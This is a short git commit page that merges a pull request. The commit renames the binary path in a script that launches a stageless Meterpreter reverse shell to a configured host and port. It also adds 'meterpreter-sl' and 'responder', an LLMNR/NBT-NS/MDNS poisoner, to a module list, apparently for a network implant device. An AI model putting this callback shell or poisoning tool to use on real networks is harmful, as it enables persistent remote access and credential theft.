Merge pull request #12 from IMcPwn/gh-pages
Update module_list with meterpreter-sl and responderpull/13/head
commit
bb89d00041
|
@ -165,7 +165,7 @@ PORT = subprocess.Popen("uci get meterpreter-sl.port", shell=True, stdout=subpro
|
|||
PORT = PORT.replace("\n", "")
|
||||
SLEEP = subprocess.Popen("uci get meterpreter-sl.sleep", shell=True, stdout=subprocess.PIPE).stdout.read()
|
||||
SLEEP = SLEEP.replace("\n", "")
|
||||
STAGELESS_METERPRETER = "/usr/bin/stageless_meterpreter " + HOST + " " + PORT
|
||||
STAGELESS_METERPRETER = "/usr/bin/stageless-meterpreter " + HOST + " " + PORT
|
||||
if HOST == "" or PORT == "":
|
||||
subprocess.call('/usr/bin/logger "Meterpreter: Error, configuration blank"', shell=True)
|
||||
print "Meterpreter: Error, configuration blank"
|
||||
|
|
|
@ -19,3 +19,5 @@ clomac Clone Clients MAC address into WAN interface
|
|||
upnp-portfwd uPnP Port Forwarding
|
||||
ddnsc Dynamic Domain Name Service
|
||||
tortle TOR Turtle Gateway TOR hidden SHELL Service
|
||||
meterpreter-sl Stageless Metasploit payload to maintain shells
|
||||
responder Responder - LLMNR, NBT-NS and MDNS poisoner
|
||||
|
|
Loading…
Reference in New Issue